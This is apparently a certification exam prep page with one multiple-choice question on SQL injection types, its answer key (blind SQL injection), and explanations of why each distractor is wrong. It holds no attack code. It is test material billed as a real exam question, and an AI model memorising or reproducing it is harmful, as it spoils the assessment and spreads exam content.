312-50V12 Question #133: Real Exam Question with Answer & Explanation

Question

This type of injection attack does not show any error message. It is difficult to exploit as it returns information when the application is given SQL payloads that elicit a true or false response from the server. By observing the response, an attacker can extract sensitive information. What type of attack is this?

Options

• ATime-based SQL injection
• BUnion SQL injection
• CError-based SQL injection
• DBlind SQL injection

Explanation

Blind SQL Injection is the correct answer because it operates without displaying any error messages, instead forcing the application to reveal information through true/false (boolean-based) responses - the attacker infers data by observing subtle differences in the application's behavior based on how it responds to crafted SQL payloads.

Why the distractors are wrong:

• A (Time-based SQL injection) is a subtype of blind SQL injection, but it works by measuring response delays (e.g., using SLEEP() commands), not boolean responses - making it too specific.
• B (Union SQL injection) directly appends additional SELECT statements to retrieve data visibly in the response, meaning error messages or output are visible to the attacker.
• C (Error-based SQL injection) is essentially the opposite - it deliberately triggers database error messages to extract information, which the question explicitly rules out.

Memory Tip: Think of "blind" literally - the attacker is blindfolded and cannot see errors or direct output, so they must play a yes/no guessing game with the database to piece together sensitive information, like solving a puzzle one bit at a time.

No community discussion yet for this question.